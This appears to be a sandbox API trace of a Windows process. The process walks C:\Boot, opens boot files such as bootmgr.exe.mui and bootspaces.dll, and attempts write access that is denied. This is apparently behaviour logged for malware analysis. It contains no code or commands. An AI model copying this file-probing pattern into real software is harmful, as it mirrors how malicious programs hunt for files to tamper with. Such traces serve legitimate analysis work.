InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.019] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="bg-BG", cAlternateFileName="")) returned 1 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0069.019] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.019] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.019] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.020] AreFileApisANSI () returned 1 [0069.020] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bg-BG", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bg-BG", lpUsedDefaultChar=0x0) returned 14 [0069.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf20 [0069.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.020] AreFileApisANSI () returned 1 [0069.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88770 [0069.020] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88770, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\bg-BG") returned 14 [0069.020] CreateFileW (lpFileName="C:\\Boot\\bg-BG" (normalized: "c:\\boot\\bg-bg"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.020] GetLastError () returned 0x5 [0069.020] GetLastError () returned 0x5 [0069.020] SetLastError (dwErrCode=0x5) [0069.020] GetLastError () returned 0x5 [0069.020] SetLastError (dwErrCode=0x5) [0069.020] GetLastError () returned 0x5 [0069.020] SetLastError (dwErrCode=0x5) [0069.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0069.020] AreFileApisANSI () returned 1 [0069.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 14 [0069.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x1c) returned 0x88518 [0069.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x313f8e8, cbMultiByte=-1, lpWideCharStr=0x88518, cchWideChar=14 | out: lpWideCharStr="C:\\Boot\\bg-BG") returned 14 [0069.021] CreateFileW (lpFileName="C:\\Boot\\bg-BG" (normalized: "c:\\boot\\bg-bg"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.021] GetLastError () returned 0x5 [0069.021] GetLastError () returned 0x5 [0069.021] SetLastError (dwErrCode=0x5) [0069.021] GetLastError () returned 0x5 [0069.021] SetLastError (dwErrCode=0x5) [0069.021] GetLastError () returned 0x5 [0069.021] SetLastError (dwErrCode=0x5) [0069.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf20 | out: hHeap=0x20000) returned 1 [0069.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88680 [0069.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.021] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xef4e6d79, ftCreationTime.dwHighDateTime=0x1d3273d, ftLastAccessTime.dwLowDateTime=0xef4e6d79, ftLastAccessTime.dwHighDateTime=0x1d3273d, ftLastWriteTime.dwLowDateTime=0xf2d79a60, ftLastWriteTime.dwHighDateTime=0x1d2a02f, nFileSizeHigh=0x0, nFileSizeLow=0x175a0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="bootspaces.dll", cAlternateFileName="BOOTSP~1.DLL")) returned 1 [0069.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0069.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.022] FindFirstFileExW (in: lpFileName="C:\\Boot\\bg-BG\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78510 [0069.022] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc47952ba, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0xc47bb525, ftLastWriteTime.dwHighDateTime=0x1d32764, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0069.022] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc47bb525, ftCreationTime.dwHighDateTime=0x1d32764, ftLastAccessTime.dwLowDateTime=0xc47bb525, ftLastAccessTime.dwHighDateTime=0x1d32764, ftLastWriteTime.dwLowDateTime=0x210bba74, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0x12f60, dwReserved0=0x0, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x462e8 [0069.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88680 | out: hHeap=0x20000) returned 1 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0069.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53718 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53718 | out: hHeap=0x20000) returned 1 [0069.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.023] AreFileApisANSI () returned 1 [0069.023] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui", lpUsedDefaultChar=0x0) returned 30 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0069.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.023] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cef0 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d000 [0069.023] AreFileApisANSI () returned 1 [0069.023] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x53298 [0069.024] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x53298, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 30 [0069.024] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0069.024] GetFileType (hFile=0x428) returned 0x1 [0069.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0069.024] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.024] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.024] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.024] CloseHandle (hObject=0x428) returned 1 [0069.025] AreFileApisANSI () returned 1 [0069.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 30 [0069.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x3c) returned 0x534d8 [0069.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88748, cbMultiByte=-1, lpWideCharStr=0x534d8, cchWideChar=30 | out: lpWideCharStr="C:\\Boot\\bg-BG\\bootmgr.exe.mui") returned 30 [0069.025] CreateFileW (lpFileName="C:\\Boot\\bg-BG\\bootmgr.exe.mui" (normalized: "c:\\boot\\bg-bg\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0069.025] GetLastError () returned 0x5 [0069.025] GetLastError () returned 0x5 [0069.025] SetLastError (dwErrCode=0x5) [0069.025] GetLastError () returned 0x5 [0069.025] SetLastError (dwErrCode=0x5) [0069.025] GetLastError () returned 0x5 [0069.025] SetLastError (dwErrCode=0x5) [0069.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0069.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0069.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cef0 | out: hHeap=0x20000) returned 1 [0069.025] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0069.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.025] FindNextFileW (in: hFindFile=0x78510, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x3a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x68b88, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x3a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓⽠\x01⺊Ā")) returned 0 [0069.025] FindClose (in: hFindFile=0x78510 | out: hFindFile=0x78510) returned 1 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f2c8 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f2c8 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x462e8 | out: hHeap=0x20000) returned 1 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d050 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cee0 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0069.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0069.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.026] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0069.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88658 | out: hHeap=0x20000) returned 1 [0069.026] AreFileApisANSI () returned 1 [0069.026] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Boot\\bootspaces.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Boot\\bootspaces.dll", lpUsedDefaultChar=0x0) returned 23 [0069.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88658 [0069.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.027] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0069.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0069.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0069.027] AreFileApisANSI () returned 1 [0069.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0069.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2e) returned 0x4de70 [0069.027] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x4de70, cchWideChar=23 | out: lpWideCharStr="C:\\Boot\\bootspaces.dll") returned 23 [0069.027] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x420 [0069.029] GetFileType (hFile=0x420) returned 0x1 [0069.029] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0069.029] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0069.029] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0069.029] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0069.029] CloseHandle (hObject=0x420) returned 1 [0069.033] AreFileApisANSI () returned 1 [0069.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 23 [0069.033] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x2e) returned 0x4e030 [0069.033] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88658, cbMultiByte=-1, lpWideCharStr=0x4e030, cchWideChar=23 | out: lpWideCharStr="C:\\Boot\\bootspaces.dll") returned 23 [0069.033] CreateFileW (lpFileName="C:\\Boot\\bootspaces.dll" (normalized: "c:\\boot\\bootspaces.dll"), 